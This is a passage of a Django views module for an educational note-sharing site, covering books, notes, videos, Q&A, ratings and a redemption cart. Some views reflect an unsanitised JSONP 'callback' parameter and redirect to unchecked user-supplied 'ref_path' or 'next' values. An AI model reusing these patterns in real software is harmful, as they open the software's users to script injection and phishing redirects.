target_type=ContentType.objects.get_for_model(Node))\r\n\r\n stream = Activity.objects.order_by('-id')[:50]\r\n stream, next_id = _digest_activity_stream(stream, 20)\r\n\r\n #one_hour_ago = datetime.datetime.now() - datetime.timedelta(hours=1)\r\n #sql_datetime = datetime.datetime.strftime(one_hour_ago, '%Y-%m-%d %H:%M:%S')\r\n #online_users = User.objects.filter(last_login__gt=sql_datetime,\r\n # is_active__exact=1).order_by('-last_login')[:10]\r\n\r\n online_users = Onliners.objects.order_by('id')\r\n online_users = [o.user for o in online_users]\r\n\r\n return render_response(request, 'ui/home.html',\r\n {#'new_notes': new_notes,\r\n 'popular_books': popular_books,\r\n #'new_videos': new_videos,\r\n 'top_users': top_users,\r\n #'active_users': active_users,\r\n #'active_topics': active_topics,\r\n 'online_users': online_users,\r\n #'new_questions': new_questions,\r\n 'stream': stream, 'next_id': next_id})\r\n\r\ndef load_media(contentmodel):\r\n core = User.objects.get(id=1)\r\n\r\n #if not contentmodel.images:\r\n # load_images(contentmodel, core)\r\n\r\n if not contentmodel.videos:\r\n load_videos(contentmodel, core)\r\n\r\ndef book_view(request, book_id):\r\n try:\r\n book = Book.objects.get(id=book_id)\r\n except ObjectDoesNotExist:\r\n return render_response(request, 'ui/base.html',\r\n {'error': 'Could not locate the book. 
Sorry.'})\r\n\r\n is_editable = book.is_editable_by(request.user)\r\n\r\n return render_response(request, 'ui/book.html',\r\n {'book': book,\r\n 'is_editable': is_editable,\r\n 'subtopics': book.node_set.filter(parent=None).order_by('order'),\r\n 'page_title': PTITLE % ('Book - %s' % book.title)})\r\n\r\n@custom_login_required\r\ndef book_add_view(request):\r\n\r\n if not request.user.get_profile().can_add_book:\r\n return render_response(request, 'ui/base.html',\r\n {'error': 'You cannot add a new book'})\r\n\r\n tags = []\r\n\r\n if request.method == 'POST':\r\n form = AddBookForm(request.POST)\r\n if form.is_valid():\r\n title = form.cleaned_data['title']\r\n isbn = form.cleaned_data['isbn']\r\n tags = form.cleaned_data['tags']\r\n\r\n default_image = os.path.join(settings.MEDIA_ROOT, 'images/book_generic.gif')\r\n default_image = os.path.normpath(default_image)\r\n cfile = ContentFile(open(default_image, 'rb').read())\r\n\r\n book = Book.objects.create(title=title, isbn=isbn, user=request.user)\r\n stream = Stream.objects.create(title='for book: %s' % book.title)\r\n book.stream = stream\r\n\r\n Activity.add(request.user, book)\r\n\r\n tags = Tag.objects.filter(id__in=tags)\r\n for t in tags:\r\n book.tags.create(tag=t)\r\n\r\n book.cover_image.save('%d_default_book.gif' % book.id, cfile, save=True)\r\n book.follow(request.user)\r\n book.rate_up(request.user)\r\n book.save()\r\n\r\n Node.objects.create(title='New topic', book=book,\r\n parent=None, order=0)\r\n\r\n return HttpResponseRedirect(reverse('book_edit_page',\r\n kwargs={'book_id': book.id}))\r\n else:\r\n form = AddBookForm()\r\n\r\n return render_response(request, 'ui/book_add.html',\r\n {'form': form, 'page_title': PTITLE % ('Add book')})\r\n\r\n@custom_login_required\r\ndef book_edit_view(request, book_id):\r\n\r\n try:\r\n book = Book.objects.get(id=book_id)\r\n except ObjectDoesNotExist:\r\n return render_response(request, 'ui/base.html',\r\n {'error': 'Could not locate the book. 
Sorry.'})\r\n\r\n is_editable = request.user.get_profile().can_edit_book(book)\r\n if not is_editable:\r\n return render_response(request, 'ui/base.html',\r\n {'error': 'You cannot edit this book'})\r\n\r\n data = {'title': book.title, 'isbn': book.isbn,\r\n 'tags': '', 'moderators': ''}\r\n form = EditBookForm(initial=data)\r\n\r\n if request.method == 'POST':\r\n if 'outline_data' in request.POST:\r\n book.update_json(request.POST['outline_data'])\r\n\r\n else:\r\n form = EditBookForm(request.POST)\r\n if form.is_valid():\r\n title = form.cleaned_data['title']\r\n isbn = form.cleaned_data['isbn']\r\n tags = form.cleaned_data['tags']\r\n moderators = form.cleaned_data['moderators']\r\n\r\n # process tags\r\n book.tags.all().delete()\r\n tags = Tag.objects.filter(id__in=tags)\r\n for t in tags:\r\n book.tags.create(tag=t)\r\n\r\n # process moderators\r\n for m in book.moderators.all():\r\n book.moderators.remove(m)\r\n\r\n moderators = User.objects.filter(id__in=moderators)\r\n for m in moderators:\r\n book.moderators.add(m)\r\n\r\n # process image\r\n image = request.FILES.get('image')\r\n if image:\r\n cfile = ContentFile(image.read())\r\n book.cover_image.save(image.name, cfile, save=True)\r\n\r\n book.title = title\r\n book.isbn = isbn\r\n book.save()\r\n\r\n tags = [{'id': t.tag.id, 'name': t.tag.name} for t in book.tags.all()]\r\n tags = json.dumps(tags)\r\n\r\n moderators = [{'id': m.id, 'name': m.get_profile().title}\\\r\n for m in book.moderators.all()]\r\n moderators = json.dumps(moderators)\r\n\r\n return render_response(request, 'ui/book_edit.html',\r\n {'book': book,\r\n 'tags': tags,\r\n 'moderators': moderators,\r\n 'form': form,\r\n 'page_title': PTITLE % ('Book Edit - %s' % book.title)})\r\n\r\ndef book_moderators_view(request, book_id, page_no=1, num=ITEMS_PER_PAGE):\r\n\r\n try:\r\n book = Book.objects.get(id=book_id)\r\n except ObjectDoesNotExist:\r\n return render_response(request, 'ui/base.html',\r\n {'error': 'Could not locate the book. Sorry.'})\r\n\r\n moderators = book.moderators.all()\r\n moderators = make_paginator(moderators, page_no, num)\r\n paging_url = '/book/moderators/%s/<PAGENO>/' % (book.id)\r\n\r\n title ='Moderators for book: %s' % (book.title)\r\n page_title = PTITLE % (title)\r\n\r\n return render_response(request, 'ui/users.html',\r\n {'users': moderators,\r\n 'page_title': page_title,\r\n 'title': title,\r\n 'paging_url': paging_url})\r\n\r\n@custom_login_required\r\ndef book_request_moderation_view(request, book_id):\r\n\r\n try:\r\n book = Book.objects.get(id=book_id)\r\n except ObjectDoesNotExist:\r\n return render_response(request, 'ui/base.html',\r\n {'error': 'Could not locate the book. Sorry.'})\r\n\r\n notification.send([book.user], 'book_mod_request',\r\n {'user': request.user, 'book': book})\r\n\r\n page_title = PTITLE % ('Book moderation request sent')\r\n return render_response(request, 'ui/book_request_moderation.html',\r\n {'owner': book.user,\r\n 'page_title': page_title,\r\n 'book': book})\r\n\r\n@custom_login_required\r\ndef book_confirm_moderation_view(request, book_id, username):\r\n try:\r\n book = Book.objects.get(id=book_id)\r\n except ObjectDoesNotExist:\r\n return render_error(request, 'Could not locate the book. 
Sorry.')\r\n\r\n if request.user != book.user:\r\n return render_error(request, 'You are not the owner of this book.')\r\n\r\n try:\r\n user = User.objects.get(username=username)\r\n except ObjectDoesNotExist:\r\n return render_error(request, 'User \"%s\" not known' % username)\r\n\r\n book.moderators.add(user)\r\n\r\n page_title = PTITLE % ('Book moderation request accepted')\r\n return render_response(request, 'ui/book_moderation_accepted.html',\r\n {'moderator': user,\r\n 'page_title': page_title,\r\n 'book': book})\r\n\r\ndef books_view(request):\r\n return HttpResponseRedirect(reverse('books_recent_page'))\r\n\r\ndef books_recent_view(request, page_no=1, num=ITEMS_PER_PAGE):\r\n books = Book.objects.all().order_by('-date_added')\r\n books = make_paginator(books, page_no, num)\r\n paging_url = '/books/recent/<PAGENO>/'\r\n page_title = PTITLE % ('Recently Added Books')\r\n return render_response(request, 'ui/books_list.html',\r\n {'books': books, 'page_title': page_title,\r\n 'paging_url': paging_url})\r\n\r\ndef books_popular_view(request, page_no=1, num=ITEMS_PER_PAGE):\r\n books = Book.objects.all().order_by('-tot_count')\r\n books = make_paginator(books, page_no, num)\r\n paging_url = '/books/popular/<PAGENO>/'\r\n page_title = PTITLE % ('Most Popular Books')\r\n return render_response(request, 'ui/books_list.html',\r\n {'books': books, 'page_title': page_title, 'paging_url': paging_url})\r\n\r\ndef books_tag_view(request, tag, page_no=1, num=ITEMS_PER_PAGE):\r\n books = get_items_by_tag(Book, [tag], 'all')\r\n books = make_paginator(books, page_no, num)\r\n paging_url = '/books/tag/%(tag)s/<PAGENO>/' % locals()\r\n page_title = PTITLE % ('Books tagged \"%s\"' % tag)\r\n return render_response(request, 'ui/books_list.html',\r\n {'books': books, 'page_title': page_title, 'paging_url': paging_url})\r\n\r\ndef books_tag_all_view(request, tags, page_no=1, num=ITEMS_PER_PAGE):\r\n paging_url = '/books/tag/all/%(tags)s/<PAGENO>/' % locals()\r\n tags = [t.strip() for t in tags.split('/') if t.strip()]\r\n books = get_items_by_tag(Book, tags, 'all')\r\n books = make_paginator(books, page_no, num)\r\n page_title = PTITLE % ('Books tagged \"%s\"' % ', '.join(tags))\r\n return render_response(request, 'ui/books_list.html',\r\n {'books': books, 'page_title': page_title, 'paging_url': paging_url})\r\n\r\ndef books_tag_any_view(request, tags, page_no=1, num=ITEMS_PER_PAGE):\r\n paging_url = '/books/tag/any/%(tags)s/<PAGENO>/' % locals()\r\n tags = [t.strip() for t in tags.split('/') if t.strip()]\r\n books = get_items_by_tag(Book, tags, 'any')\r\n books = make_paginator(books, page_no, num)\r\n page_title = PTITLE % ('Books tagged with one of \"%s\"' % ', '.join(tags))\r\n return render_response(request, 'ui/books_list.html',\r\n {'books': books, 'page_title': page_title, 'paging_url': paging_url})\r\n\r\ndef tags_view(request):\r\n term = request.GET['q'].lower()\r\n\r\n query = 'SELECT id, name FROM core_tag WHERE LOWER(name) LIKE %s ORDER BY name'\r\n cursor = connection.cursor()\r\n cursor.execute(query, ('%'+term+'%',))\r\n\r\n tags = [dict(id=_id, name=name) for _id, name in cursor.fetchall()]\r\n\r\n if 'callback' in request.GET:\r\n response = '%s(%s)' % (request.GET['callback'], json.dumps(tags))\r\n else:\r\n response = json.dumps(tags)\r\n\r\n return HttpResponse(response, mimetype='application/json')\r\n\r\ndef node_view(request, node_id):\r\n try:\r\n node = Node.objects.get(id=node_id)\r\n load_media(node)\r\n except ObjectDoesNotExist:\r\n return render_response(request, 
'ui/node.html', {\r\n 'error': 'no node with id %s' % node_id})\r\n\r\n bread_crumbs = build_breadcrumbs(node)\r\n\r\n return render_response(request, 'ui/node.html', {\r\n 'node': node,\r\n 'bread_crumbs': bread_crumbs,\r\n 'page_title': PTITLE % ('Topic - %s' % node.title)}\r\n )\r\n\r\ndef build_breadcrumbs(node):\r\n s = StringIO()\r\n parents = []\r\n\r\n parents.append(('/node/%s/%s/' % (node.id, urlsafe(node.title)),\r\n xcode(node.title)))\r\n\r\n while node.parent:\r\n node = node.parent\r\n parents.append(('/node/%s/%s/' % (node.id, urlsafe(node.title)),\r\n xcode(node.title)))\r\n\r\n parents.append(('/book/%s/%s/' % (node.book.id, urlsafe(node.book.title)),\r\n xcode(node.book.title)))\r\n\r\n while parents:\r\n url, title = parents.pop()\r\n s.write('<a href=\"%s\">%s</a>' % (url, title))\r\n if parents:\r\n s.write(' > ')\r\n\r\n return s.getvalue()\r\n\r\ndef note_view(request, note_id):\r\n\r\n note = Note.objects.get(id=note_id)\r\n page_title = PTITLE % ('Notes for %s' % note.target.title)\r\n\r\n return render_response(request, 'ui/note.html', {\r\n 'note': note, 'page_title': page_title})\r\n\r\n@custom_login_required\r\ndef note_edit_view(request, note_id, page_no=1, num=ITEMS_PER_PAGE):\r\n\r\n note = Note.objects.get(id=note_id)\r\n versions = Version.objects.get_for_object(note).reverse()\r\n\r\n if 'note' in request.POST:\r\n\r\n redirect_url = xcode(request.POST['content_path'])\r\n if not request.POST['note'] and not versions:\r\n note.delete()\r\n return HttpResponseRedirect(redirect_url)\r\n\r\n with revision:\r\n note.text.raw = request.POST['note']\r\n note.save()\r\n\r\n revision.user = request.user\r\n revision.comment = request.POST['comment'] or 'update'\r\n\r\n followers = get_followers(note, note.target,\r\n request.user.get_profile())\r\n notification.send(followers, 'note_changed', {'user': request.user,\r\n 'note': note})\r\n\r\n\r\n return HttpResponseRedirect(redirect_url)\r\n\r\n else:\r\n\r\n versions = make_paginator(versions, page_no, num)\r\n paging_url = '/note/%s/revisions/<PAGENO>/' % note.id\r\n page_title = PTITLE % ('Notes for %s' % note.target.title)\r\n\r\n return render_response(request, 'ui/note_edit.html',\r\n {'note': note, 'versions': versions,\r\n 'page_title': page_title,\r\n 'paging_url': paging_url})\r\n\r\ndef note_revision_view(request, note_id, revision_id):\r\n note = Note.objects.get(id=note_id)\r\n version = Version.objects.get(id=revision_id)\r\n page_title = PTITLE % ('Note Revision for %s' % note.target.title)\r\n\r\n return render_response(request, 'ui/revision.html',\r\n {'version': version, 'note': note, 'page_title': page_title})\r\n\r\n@custom_login_required\r\ndef note_revision_revert_view(request, note_id, revision_id):\r\n version = Version.objects.get(id=revision_id)\r\n note = Note.objects.get(id=note_id)\r\n\r\n with revision:\r\n note.text.raw = version.field_dict['text']\r\n note.save()\r\n\r\n revision.user = request.user\r\n revision.comment = 'reverting to revision number %d' % version.id\r\n\r\n return HttpResponseRedirect(request.POST['ref_path'])\r\n\r\ndef video_view(request, avideo_id):\r\n amedia = None\r\n\r\n try:\r\n avideo = AssociatedMedia.objects.get(id=avideo_id)\r\n title = avideo.media.title\r\n\r\n except ObjectDoesNotExist:\r\n #return render_response(request, 'ui/video.html',\r\n # {'error': 'no video with id %s' % video_id})\r\n\r\n #Added on 11-10-2013 by Yatish(to handle error condition if video is not present)\r\n #return HttpResponseRedirect(reverse('home_page'))\r\n #data = 
render_to_response(request, 'ui/404.html')\r\n data = render_response(request, 'ui/404.html')\r\n return HttpResponse(data.content, status=410)\r\n\r\n return render_response(request, 'ui/video.html',\r\n {'avideo': avideo,\r\n 'page_title': PTITLE % ('Video for %s' % title)})\r\n\r\ndef videos_view(request, target_type, target,\r\n page_no=1, num=ITEMS_PER_PAGE):\r\n target = get_target(target_type, target)\r\n videos = make_paginator(target.videos, page_no, num)\r\n paging_url = '/videos/%s/%s/<PAGENO>/%s/' % (target.ctype.id,\r\n target.id, target.title)\r\n\r\n return render_response(request, 'ui/videos.html',\r\n {'target': target, 'videos': videos,\r\n 'page_title': PTITLE % ('Videos for %s' % target.title),\r\n 'paging_url': paging_url})\r\n\r\ndef image_view(request, image_id):\r\n try:\r\n image = Image.objects.get(id=image_id)\r\n args = {'image': image}\r\n except ObjectDoesNotExist:\r\n args = {'error': 'no image with id %s' % image_id}\r\n\r\n # FIXME: args['page_title'] = PTITLE\r\n return render_response(request, 'ui/image.html', args)\r\n\r\ndef images_view(request, target_type, target,\r\n page_no=1, num=ITEMS_PER_PAGE):\r\n target = get_target(target_type, target)\r\n images = make_paginator(target.images, page_no, num)\r\n\r\n # FIXME: compute page title and pass to template as page_title\r\n return render_response(request, 'ui/images.html',\r\n {'target': target, 'images': images})\r\n\r\ndef notes_view(request, target_type, target, page_no=1, num=ITEMS_PER_PAGE):\r\n target = get_target(target_type, target)\r\n notes = make_paginator(target.notes, page_no, num)\r\n paging_url = '/notes/%s/%s/<PAGENO>/' % (target.ctype.id, target.id)\r\n page_title = PTITLE % ('Notes for %s' % target.title)\r\n\r\n return render_response(request, 'ui/notes.html',\r\n {'target': target, 'notes': notes,\r\n 'page_title': page_title,\r\n 'paging_url': paging_url})\r\n\r\ndef get_yt_id(yt_url):\r\n query_part = yt_url.split('?')[-1]\r\n parts = query_part.split('&')\r\n for p in parts:\r\n if p.startswith('v='):\r\n return p.split('v=')[-1]\r\n return None\r\n\r\ndef get_ytvideo_title(yt_id):\r\n api = 'http://gdata.youtube.com/feeds/api/videos/%s'\r\n url = api % yt_id\r\n\r\n text = get_doc(url, settings.CACHE_DIR)\r\n title = re.findall('<title.*?>(.*?)</title>', text)\r\n if title:\r\n return title[0].decode('utf8', 'ignore')\r\n return None\r\n\r\n@custom_login_required\r\ndef add_video(request):\r\n user = request.user\r\n\r\n video_url = request.POST['video_url']\r\n target = get_target_from_req(request)\r\n\r\n yt_id = get_yt_id(video_url)\r\n\r\n if not yt_id:\r\n return HttpResponseRedirect(request.POST['ref_path'])\r\n\r\n title = get_ytvideo_title(yt_id)\r\n\r\n try:\r\n video = Video.objects.create(source='youtube', source_id=yt_id,\r\n user=user, title=title)\r\n except IntegrityError:\r\n video = Video.objects.get(source='youtube', source_id=yt_id)\r\n\r\n try:\r\n avideo = AssociatedMedia.add(user=user, target=target, media=video)\r\n avideo.rate_up(user)\r\n avideo.save()\r\n follow_root(avideo, user)\r\n\r\n give_points('video_add', user=user.id, avideo=avideo.id)\r\n ac = Activity.add(user, avideo)\r\n add_to_book_stream(avideo, ac)\r\n\r\n followers = get_followers(video, user.get_profile())\r\n notification.send(followers, 'video_add', {'user': user,\r\n 'video': video})\r\n except IntegrityError:\r\n pass\r\n\r\n return HttpResponseRedirect(request.POST['ref_path'])\r\n\r\n@custom_login_required\r\ndef add_image(request):\r\n user = request.user\r\n\r\n target_type = 
request.POST['target_type']\r\n    target = request.POST['target']\r\n    image_url = request.POST['image_url']\r\n\r\n    # get_target_from_req() resolves the target object from the POSTed\r\n    # target_type/target pair (the manual ContentType lookup here used an\r\n    # undefined name, content_type, and raised NameError on every call)\r\n    target = get_target_from_req(request)\r\n\r\n    #TODO Integrity check has to be done\r\n    image = Image.objects.create(url=image_url, user=user)\r\n    aimage = AssociatedMedia.add(user=user, target=target, media=image)\r\n    aimage.rate_up(user)\r\n    aimage.save()\r\n    follow_root(aimage, user)\r\n\r\n    return HttpResponseRedirect(request.POST['ref_path'])\r\n\r\n@custom_login_required\r\ndef add_note(request):\r\n    user = request.user\r\n    target = get_target_from_req(request)\r\n\r\n    note = Note.add(target, user=user)\r\n    note.rate_up(user)\r\n    note.save()\r\n    follow_root(note, user)\r\n\r\n    give_points('note_add', user=user.id, note=note.id)\r\n    ac = Activity.add(user, note)\r\n    add_to_book_stream(note, ac)\r\n\r\n    return HttpResponseRedirect(reverse('note_edit_page', args=(note.id,)))\r\n\r\n@custom_login_required\r\ndef question(request):\r\n    user = request.user\r\n    q_text = request.POST['question_text']\r\n    if not q_text:\r\n        return HttpResponseRedirect(request.POST['ref_path'])\r\n\r\n    target = get_target_from_req(request)\r\n    question = Question.add(user, target, q_text)\r\n    question.rate_up(user)\r\n    question.save()\r\n    follow_root(question, user)\r\n\r\n    ac = Activity.add(user, question)\r\n    add_to_book_stream(question, ac)\r\n    give_points('question_add', user=user.id, question=question.id)\r\n\r\n    followers = get_followers(target, user.get_profile())\r\n    notification.send(followers, 'question_add', {'user': user,\r\n                                                  'question': question})\r\n\r\n    return HttpResponseRedirect(request.POST['ref_path'])\r\n\r\n@custom_login_required\r\ndef answer(request):\r\n    user = request.user\r\n\r\n    q_id = request.POST['q_id']\r\n    a_text = sanitize_whitespace(request.POST['answer_text'])\r\n    if not a_text:\r\n        return HttpResponseRedirect(request.POST['ref_path'])\r\n\r\n    question = Question.objects.get(id=q_id)\r\n    answer = Answer.objects.create(user=user, question=question, text=a_text)\r\n    answer.rate_up(user)\r\n    answer.save()\r\n    question.save()\r\n    follow_root(question, user)\r\n\r\n    ac = Activity.add(user, answer)\r\n    if question.user != user:\r\n        question.user.get_profile().stream.add(ac)\r\n    add_to_book_stream(answer, ac)\r\n\r\n    give_points('answer_add', user=user.id, answer=answer.id)\r\n\r\n    followers = get_followers(question,\r\n                              question.target,\r\n                              user.get_profile())\r\n    notification.send(followers, 'answer_add', {'user': user, 'answer': answer,\r\n                                                'question': question})\r\n\r\n    return HttpResponseRedirect(request.POST['ref_path'])\r\n\r\ndef question_view(request, q_id):\r\n    question = Question.objects.get(id=q_id)\r\n    answer_text_id = 'answer_text_%d_%d' % (question.ctype.id, question.id)\r\n    page_title = PTITLE % ('Question: %s' % question.text.raw)\r\n\r\n    return render_response(request, 'ui/question.html', {\r\n        'question': question, 'page_title': page_title,\r\n        'answer_text_id': answer_text_id})\r\n\r\ndef questions_view(request, target_type, target,\r\n                   page_no=1, num=ITEMS_PER_PAGE):\r\n    target = get_target(target_type, target)\r\n    questions = make_paginator(target.questions.all(), page_no, num)\r\n    paging_url = '/questions/%s/%s/<PAGENO>/' % (target.ctype.id, target.id)\r\n    page_title = PTITLE % ('Questions for %s' % target.title)\r\n\r\n    return render_response(request, 'ui/questions.html', {\r\n        'target': target,\r\n        'questions': 
questions,\r\n 'page_title': page_title,\r\n 'paging_url': paging_url}\r\n )\r\n\r\n@custom_login_required\r\ndef rate(request):\r\n user = request.user\r\n\r\n rating = request.POST['rating']\r\n target = get_target_from_req(request)\r\n\r\n rate_obj = target.rate_up(user) if rating == 'up' else target.rate_down(user)\r\n target.save()\r\n\r\n if rate_obj:\r\n ac = Activity.add(user, rate_obj)\r\n\r\n if target.user != user:\r\n target.user.get_profile().stream.add(ac)\r\n add_to_book_stream(target, ac)\r\n\r\n follow_root(target, user)\r\n\r\n followers = get_followers(target, user.get_profile())\r\n\r\n template_variables = {'user': user, 'rate_obj': target, 'rating': rating}\r\n fn = lambda n: notification.send(followers, n, template_variables)\r\n\r\n if isinstance(target, Question):\r\n fn('question_rated')\r\n elif isinstance(target, Answer):\r\n fn('answer_rated')\r\n elif isinstance(target, UserProfile):\r\n fn('profile_rated')\r\n elif isinstance(target, Note):\r\n fn('note_rated')\r\n elif isinstance(target, AssociatedMedia):\r\n fn('video_rated')\r\n elif isinstance(target, Book):\r\n fn('book_rated')\r\n elif isinstance(target, Node):\r\n fn('node_rated')\r\n\r\n return HttpResponseRedirect(request.POST['ref_path'])\r\n\r\n@custom_login_required\r\ndef follow(request):\r\n user = request.user\r\n\r\n follow = request.POST['follow']\r\n target = get_target_from_req(request)\r\n follow_obj = target.follow(user) if follow == 'follow' else target.unfollow(user)\r\n target.save()\r\n\r\n if follow_obj:\r\n ac = Activity.add(user, follow_obj)\r\n\r\n if target.user != user:\r\n target.user.get_profile().stream.add(ac)\r\n add_to_book_stream(target, ac)\r\n\r\n return HttpResponseRedirect(request.POST['ref_path'])\r\n\r\n@custom_login_required\r\ndef flag(request):\r\n user = request.user\r\n\r\n flag = request.POST['flag']\r\n target = get_target_from_req(request)\r\n flag_obj = target.flag(user) if flag == 'flag' else target.unflag(user)\r\n target.save()\r\n\r\n if flag_obj:\r\n ac = Activity.add(user, flag_obj)\r\n\r\n if target.user != user:\r\n target.user.get_profile().stream.add(ac)\r\n add_to_book_stream(target, ac)\r\n\r\n return HttpResponseRedirect(request.POST['ref_path'])\r\n\r\ndef feedback_view(request):\r\n name = ''\r\n email = ''\r\n\r\n if request.user.is_authenticated():\r\n name = request.user.get_profile().title\r\n email = request.user.email\r\n\r\n if request.method == 'POST':\r\n form = FeedbackForm(request.POST)\r\n\r\n if form.is_valid():\r\n\r\n name = form.cleaned_data['name']\r\n email = form.cleaned_data['email']\r\n feedback = form.cleaned_data['feedback']\r\n\r\n followers = User.objects.filter(is_superuser=True)\r\n# import pdb; pdb.set_trace()\r\n notification.send(followers, '_user_feedback',\r\n {'user': request.user, 'feedback': feedback,\r\n 'name': name, 'email': email})\r\n\r\n return HttpResponseRedirect(reverse('feedback_sent_page'))\r\n else:\r\n data = {'name': name, 'email': email}\r\n form = FeedbackForm(initial=data)\r\n\r\n return render_response(request, 'ui/feedback.html',\r\n {'form': form,\r\n 'page_title': PTITLE % 'Feedback'})\r\n\r\ndef feedback_sent_view(request):\r\n return render_response(request, 'ui/feedback_sent.html', {})\r\n\r\[email protected]_login()\r\ndef fb_login(request):\r\n user = authenticate(request=request)\r\n\r\n if user and user.is_active:\r\n login(request, user)\r\n\r\n if not user.email:\r\n next = '/email/'\r\n else:\r\n next = request.GET.get('next', reverse('home_page'))\r\n\r\n return 
HttpResponseRedirect(next)\r\n\r\n@custom_login_required\r\ndef invite_view(request):\r\n if request.method == 'POST':\r\n form = InviteForm(request.POST)\r\n if form.is_valid():\r\n next = request.POST.get('ref_path', '')\r\n emails = form.cleaned_data['emails']\r\n message = form.cleaned_data['message']\r\n\r\n recipients = re.findall('[A-Za-z0-9\\._@]+', emails)\r\n subject = 'Invitation from %s.' % request.user.get_profile().title\r\n t = template.loader.get_template('ui/invite_message.html')\r\n c = Context({'user': request.user, 'message': message})\r\n body = t.render(c)\r\n\r\n send_mail(subject, body, settings.DEFAULT_FROM_EMAIL, recipients)\r\n\r\n return HttpResponseRedirect(next or reverse('home_page'))\r\n else:\r\n form = InviteForm()\r\n next = request.GET.get('ref_path', '')\r\n\r\n return render_response(request, 'ui/invite.html',\r\n {'form': form,\r\n 'next': next,\r\n 'page_title': PTITLE % 'Invite Friends'})\r\n\r\ndef uppers_view(request, target_type, target, page_no=1, num=ITEMS_PER_PAGE):\r\n target = get_target(target_type, target)\r\n uppers = target.ratings.filter(rating=1).order_by('-date_added')\r\n uppers = make_paginator(uppers, page_no, num)\r\n paging_url = '/up/%s/%s/<PAGENO>/' % (target.ctype.id, target.id)\r\n\r\n page_title = PTITLE % ('Users who liked %s' % target.title)\r\n title = 'Users who liked '\r\n\r\n if isinstance(target, User):\r\n target = target.get_profile\r\n\r\n can_rate_or_flag = isinstance(target, RateFlag)\r\n can_follow = isinstance(target, Followable)\r\n\r\n return render_response(request, 'ui/ausers.html',\r\n {'target': target, 'users': uppers,\r\n 'page_title': page_title,\r\n 'title': title,\r\n 'can_rate_or_flag': can_rate_or_flag,\r\n 'can_follow': can_follow,\r\n 'paging_url': paging_url})\r\n\r\ndef downers_view(request, target_type, target, page_no=1, num=ITEMS_PER_PAGE):\r\n target = get_target(target_type, target)\r\n downers = target.ratings.filter(rating=-1).order_by('-date_added')\r\n downers = make_paginator(downers, page_no, num)\r\n paging_url = '/down/%s/%s/<PAGENO>/' % (target.ctype.id, target.id)\r\n\r\n page_title = PTITLE % ('Users who disliked %s' % target.title)\r\n title = 'Users who disliked '\r\n if isinstance(target, User):\r\n target = target.get_profile\r\n\r\n if isinstance(target, Node) or isinstance(target, Book):\r\n isprimarymodel = True\r\n else:\r\n isprimarymodel = False\r\n\r\n return render_response(request, 'ui/ausers.html',\r\n {'target': target, 'users': downers,\r\n 'page_title': page_title,\r\n 'title': title,\r\n 'isprimarymodel': isprimarymodel,\r\n 'paging_url': paging_url})\r\n\r\ndef followers_view(request, target_type, target, page_no=1, num=ITEMS_PER_PAGE):\r\n target = get_target(target_type, target)\r\n followers = target.followers.order_by('-date_added')\r\n followers = make_paginator(followers, page_no, num)\r\n paging_url = '/followers/%s/%s/<PAGENO>/' % (target.ctype.id, target.id)\r\n\r\n page_title = PTITLE % ('Followers of %s' % target.title)\r\n title = 'Followers of '\r\n if isinstance(target, User):\r\n target = target.get_profile\r\n\r\n if isinstance(target, Node) or isinstance(target, Book):\r\n isprimarymodel = True\r\n else:\r\n isprimarymodel = False\r\n\r\n return render_response(request, 'ui/ausers.html',\r\n {'target': target, 'users': followers,\r\n 'page_title': page_title,\r\n 'title': title,\r\n 'isprimarymodel': isprimarymodel,\r\n 'paging_url': paging_url})\r\n\r\ndef users_view(request, page_no=1, num=ITEMS_PER_PAGE):\r\n\r\n term = request.GET.get('q', 
None)\r\n\r\n if term:\r\n term = term.lower()\r\n\r\n users = User.objects.filter(Q(username__icontains=term) |\\\r\n Q(first_name__icontains=term) |\\\r\n Q(last_name__icontains=term))\r\n\r\n MAX_USERS = 10\r\n users = [dict(id=u.id, name=u.get_profile().title)\\\r\n for u in users[:MAX_USERS]]\r\n if 'callback' in request.GET:\r\n response = '%s(%s)' % (request.GET['callback'], json.dumps(users))\r\n else:\r\n response = json.dumps(users)\r\n\r\n return HttpResponse(response, mimetype='application/json')\r\n\r\n if not request.user.is_superuser:\r\n error = \"You don't have permission to see this page\"\r\n return render_response(request, 'ui/users.html',\r\n {'error':error})\r\n\r\n users = User.objects.order_by('-date_joined')\r\n users = make_paginator(users, page_no, num)\r\n paging_url = '/users/<PAGENO>/'\r\n\r\n page_title = PTITLE % ('Users')\r\n title = 'Users of Notemonk'\r\n\r\n return render_response(request, 'ui/users.html',\r\n {'users': users,\r\n 'page_title': page_title,\r\n 'title': title,\r\n 'paging_url': paging_url})\r\n\r\ndef redeemables_view(request, page_no=1, num=ITEMS_PER_PAGE):\r\n redeemables = RedeemableItem.objects.exclude(num=0).order_by('-credits')\r\n redeemables = make_paginator(redeemables, page_no, num)\r\n paging_url = '/redeemables/<PAGENO>'\r\n return render_response(request, 'ui/redeemables.html',\r\n {'redeemables': redeemables,\r\n 'page_title': PTITLE % 'Redeemables',\r\n 'paging_url': paging_url})\r\n\r\ndef redeemable_view(request, item_id):\r\n redeemable = RedeemableItem.objects.get(id=int(item_id))\r\n page_title = PTITLE % ('Redeemable - %s' % xcode(redeemable.title),)\r\n return render_response(request, 'ui/redeemable.html',\r\n {'redeemable': redeemable,\r\n 'page_title': page_title})\r\n\r\ndef redemption_view(request, r_id):\r\n\r\n show_msg = request.GET.get('msg', None)\r\n redemption = Redemption.objects.get(id=r_id)\r\n redemption_items = RedemptionItem.objects.filter(redemption=redemption)\r\n more_info = False\r\n\r\n user = request.user\r\n if user.is_superuser or user.is_staff or redemption.user == user:\r\n more_info = True\r\n\r\n message = ''\r\n if show_msg:\r\n message = 'Checkout done. 
You will receive the items within 15 days from the end of this month'\r\n\r\n return render_response(request, 'ui/redemption.html',\r\n {'redemption': redemption,\r\n 'redemption_items': redemption_items,\r\n 'more_info': more_info,\r\n 'error': message})\r\n\r\n@custom_login_required\r\ndef cart_add_view(request, item_id, num_items):\r\n redeemable = RedeemableItem.objects.get(id=item_id)\r\n\r\n if redeemable.num:\r\n num_items = int(num_items) if num_items else 0\r\n cart = request.session.get('cart', [])\r\n\r\n if item_id not in dict(cart):\r\n cart.append([item_id, num_items or 1])\r\n\r\n else:\r\n for index, (cur_item_id, num) in enumerate(cart):\r\n if cur_item_id == item_id:\r\n cart[index] = [item_id, num_items or (num + 1)]\r\n break\r\n\r\n request.session['cart'] = cart\r\n\r\n next = request.GET.get('next', reverse('home_page'))\r\n return HttpResponseRedirect(next)\r\n\r\n@custom_login_required\r\ndef cart_remove_view(request, item_id):\r\n cart = request.session.get('cart', [])\r\n\r\n for index, (cur_item_id, num) in enumerate(cart):\r\n if cur_item_id == item_id:\r\n cart[index] = None\r\n\r\n request.session['cart'] 